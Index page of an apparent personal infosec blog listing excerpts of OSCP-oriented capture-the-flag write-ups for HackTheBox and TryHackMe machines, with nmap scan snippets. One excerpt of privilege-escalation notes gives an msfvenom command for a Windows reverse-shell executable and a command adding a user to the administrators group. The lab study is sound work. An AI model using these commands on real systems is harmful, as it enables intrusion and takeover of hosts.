Home
Lab icon
Hackthebox Tryhackme
Archives
My Projects icon
Pocketphish Stack Discovery
About
  • Jerry

    Dec 31, 2020 TJNull's List Windows Tomcat

    Introduction: Jerry is a very easy machine where you can enumerate the tomcat webserver and upload a webshell to exploit the box. Recon 1 nmap -sS -sC -sV -T4 -O -oN nmap.jerry.txt 10.10.10.95 2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 15:22 EST 3Nmap scan report for 10.10.10.95 4Host is up (0.013s …

    Read More
  • Grandpa

    Dec 31, 2020 TJNull's List Windows Metasploit

    Introduction: The “grandpa” is an easy windows machine with a CVE exploit using metasploit. Since the machine is very old, its also vulnerable to many other exploits that you can chose from for the privilege escalation at the end. The key takeaways for me were Based on the CVE you are exploiting, determine …

    Read More
  • Devel

    Dec 23, 2020 TJNull's List Windows IIS Metasploit

    Introduction: This is a windows machine running IIS server, FTP service and presents few exploitable vulnerabilities. Its a very easy machine and I avoided using metasploit to work on this machine as I want to avoid/limit the usage as much as possible keeping the OSCP in mind. Recon Nmap output 1Nmap scan report for …

    Read More
  • Blue

    Dec 21, 2020 TJNull's List Metasploit Windows

    Introduction: Recon 1# nmap -sS -sV -sC -T4 -oN nmap.blue.txt 10.10.10.40 2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 20:24 EST 3Nmap scan report for 10.10.10.40 4Host is up (0.015s latency). 5Not shown: 991 closed ports 6PORT STATE SERVICE VERSION 7135/tcp open msrpc Microsoft Windows RPC 8139/tcp open …

    Read More
  • Granny

    Dec 10, 2020 TJNull's List Metasploit Windows

    Introduction: The “granny” is a windows box and very similar to the “grandpa” box in terms of the exploits and privesc. You will be exploiting an IIS CVE to gain initial access to the machine, then migrate your process and use one of the many possible exploits to do a privilege escalation. Recon …

    Read More
  • Privilege Escalation on Linux

    Dec 6, 2020 tips windows PrivEsc

    OSCP Notes msfvenom to spawn rev shell on windows - #msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your host> LPORT=<your port> -f exe -o revshell.exe Adding user to Admin group - net localgroup administrators <username> /add PsExec tool - to escalate from admin user to full SYSTEM privs - …

    Read More
  • Gatekeeper - Buffer Overflow

    Nov 29, 2020 buffer overflow windows mona immunity debugger

    TryHackMe link: https://tryhackme.com/room/gatekeeper Recon Let’s get started with the nmap scan. I also kicked off the threader3000 port scanner script (https://github.com/dievus/threader3000.git) which I have started to like a lot since it often reveals ports that were missed by nmap scans. 1# nmap -Pn -A -T4 …

    Read More
  • Brainstorm - Buffer Overflow

    Nov 28, 2020 buffer overflow windows mona immunity debugger

    Reconnaissance Run a port scanner to check for open ports on the target system. 1------------------------------------------------------------ 2 Threader 3000 - Multi-threaded Port Scanner 3 Version 1.0.6 4 A project by The Mayor 5------------------------------------------------------------ 6Enter your target IP address …

    Read More
  • Relevant

    Oct 3, 2020 Windows PrivEsc IIS

    Scope of work The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you …

    Read More

wirem0nster

engineer, innovator, and a student for ever
Read More

Featured Posts

  • OSCP Notes - Work in progress
  • frolic
  • Privilege Escalation on Linux
  • Privilege Escalation on Linux
  • Privilege Escalation on Linux
  • Gatekeeper - Buffer Overflow
  • Online Resources for Pentesters
  • Relevant
  • Daily Bugle

Recent Posts

  • OSCP Notes - Work in progress
  • bountyhunter
  • schooled
  • bastion
  • tenet
  • jarvis
  • ready
  • swagshop

categories

HACKING 53 OSCP 47 PENTESTING 10 REVERSE-ENGINEERING 3 TECHNOLOGY 3 NOTES 1

tags

TJNULLS-LIST 40 WINDOWS 9 TIPS 5 LINUX 4 METASPLOIT 4 PRIVESC 4 BUFFER-OVERFLOW 3 CRACKING 3 IMMUNITY-DEBUGGER 3 MONA 3 SMB 3 FORENSICS 2 IIS 2 INDEX 2
All tags
BUFFER-OVERFLOW3 BURPSUITE1 CRACKING3 CTF1 CURL1 DOCKER1 DOCUMENTATION1 ENUMERATION1 FORENSICS2 HYDRA1 IIS2 IMMUNITY-DEBUGGER3 INDEX2 IOT1 JAVA1 JENKINS1 JOHN-THE-RIPPER1 LINUX4 METASPLOIT4 MONA3 MONGO2 NMAP1 NOSQL-INJECTION2 NOTES1 PENTESTING1 PHP-SERIALIZATION1 PHPMYADMIN1 PI-HOLE1 PRIVESC4 PYTHON-LIBRARY-HIJACK1 RASPBERRY-PI1 RELEASE-ARENA1 SCREEN1 SMB3 SQL-INJECTION1 SSH-PORT-FORWARD1 STEGANOGRAPHY1 SUID2 TIPS5 TJNULLS-LIST40 TOMCAT1 TOOLS2 TRICKS1 UNTAGGED1 WEBAPP1 WEBSHELL1 WINDOWS9 WINDOWS-DEVICE-PORTAL1 WINE1 WIRESHARK2 ZONE-TRANSFER1
[A~Z][0~9]

Copyright © 2021 WIREM0NSTER'S INFOSEC LOG. All Rights Reserved